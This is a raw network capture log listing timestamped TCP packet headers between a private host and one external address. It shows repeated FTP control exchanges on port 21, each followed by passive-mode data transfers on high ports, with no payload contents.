Aug 18, 2024 18:31:23.124814034 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.124897003 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.125499964 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.125694036 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.129451036 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129549980 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129555941 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.129559994 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129578114 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129587889 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129596949 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129609108 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.129625082 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.129672050 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.129688978 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.129740953 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.130028963 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.130115986 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.130125046 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.130145073 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.130156994 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.130194902 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.130485058 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.131031036 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.136991978 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137121916 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137135983 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137197018 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137299061 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137365103 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137942076 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.137993097 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.138001919 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.138014078 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.138686895 CEST	57612	54717	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.138786077 CEST	54717	57612	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.160456896 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:23.607978106 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:23.660631895 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:26.134306908 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:26.277409077 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:26.498522043 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:26.499059916 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:26.503870964 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:26.503947973 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:26.504038095 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:26.508991003 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.144285917 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.144682884 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.149617910 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149635077 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149645090 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149656057 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149712086 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.149840117 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149851084 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149857044 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149867058 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149877071 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149888039 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.149924994 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.149971008 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.154584885 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154596090 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154654026 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154664040 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154674053 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154684067 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154692888 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.154696941 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154715061 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.154736042 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.154789925 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154799938 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154814959 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154854059 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154962063 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.154958963 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.159498930 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.159581900 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.159630060 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.159636974 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.159668922 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.159837008 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.159869909 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.159914970 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.160013914 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.164572001 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.164582014 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.164599895 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.165028095 CEST	57066	54718	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:27.165139914 CEST	54718	57066	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:27.195070028 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:28.280816078 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:28.332310915 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:34.994852066 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:34.999763012 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.220156908 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.222208977 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.227031946 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.227114916 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.227209091 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.232018948 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.843422890 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.843727112 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848634005 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848675966 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848681927 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848690033 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848702908 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848727942 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848753929 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848756075 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848798990 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848807096 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848819971 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848839998 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848853111 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848856926 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848902941 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.848927021 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.848965883 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.853785992 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853799105 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853811979 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853841066 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.853859901 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853866100 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.853909969 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.853921890 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853959084 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.853966951 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.854002953 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.854322910 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.854335070 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.854393959 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.854403019 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.854587078 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.858967066 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859008074 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859019995 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859097958 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859110117 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859185934 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859318018 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859358072 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859391928 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859492064 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859535933 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.859549046 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.860181093 CEST	65320	54719	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:35.860233068 CEST	54719	65320	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:35.894826889 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:36.306984901 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:36.347944975 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:43.554930925 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:43.559803009 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:43.781168938 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:43.781548977 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:43.786562920 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:43.786629915 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:43.786690950 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:43.791661024 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.559139967 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.559439898 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564405918 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564466000 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564479113 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564512968 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564527035 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564559937 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564574957 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564588070 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564606905 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564634085 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564728975 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564770937 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564779997 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564807892 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564826012 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564835072 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.564852953 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.564882040 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569231033 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569283009 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569504976 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569538116 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569555044 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569577932 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569633007 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569681883 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569685936 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569710016 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569731951 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569751978 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569776058 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569808960 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569828987 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569863081 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.569888115 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.569943905 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.570023060 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.570056915 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.570081949 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.570084095 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.570100069 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.571005106 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.574254990 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.574600935 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.574999094 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575047970 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575074911 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575105906 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575158119 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575191021 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575299978 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575330019 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575403929 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575431108 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575462103 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575764894 CEST	64424	54720	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:44.575813055 CEST	54720	64424	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:44.613571882 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:45.042337894 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:45.084717989 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:46.916713953 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:46.921786070 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.143198967 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.145740986 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.150758028 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.152772903 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.152854919 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.157697916 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.763725042 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.764002085 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769036055 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769052982 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769077063 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769088984 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769109964 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769143105 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769186974 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769191980 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769207001 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769236088 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769253016 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769315004 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769329071 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769339085 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.769367933 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.769397020 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779671907 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779725075 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779736996 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779742002 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779766083 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779767990 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779781103 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779793978 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.779798031 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779834986 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779851913 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.779978037 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.780051947 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.780209064 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.780276060 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.784697056 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.784761906 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.784796953 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.784909964 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.784940004 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.784945011 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785151958 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785175085 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785243988 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785368919 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785381079 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.785392046 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.789769888 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.789796114 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.789809942 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.789921045 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.790288925 CEST	63418	54721	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:47.790347099 CEST	54721	63418	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:47.816700935 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:48.474139929 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:48.507780075 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:48.507827044 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:53.933923960 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.073810101 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.332743883 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.338583946 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.343403101 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.343472958 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.347193003 CEST	54709	21	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.351999998 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.971827030 CEST	21	54709	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.973320961 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.978319883 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978390932 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978425026 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978446960 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978460073 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978463888 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.978496075 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.978534937 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.978840113 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.978966951 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.979093075 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.979142904 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.979218960 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.979233980 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.979274988 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.985213995 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985229015 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985239983 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985244989 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985346079 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985358953 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985374928 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.985487938 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.985488892 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985502005 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985512972 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985523939 CEST	52992	54722	104.247.165.99	192.168.2.5
Aug 18, 2024 18:31:54.985585928 CEST	54722	52992	192.168.2.5	104.247.165.99
Aug 18, 2024 18:31:54.986002922 CEST	52992	54722	104.247.165.99	192.168.2.5
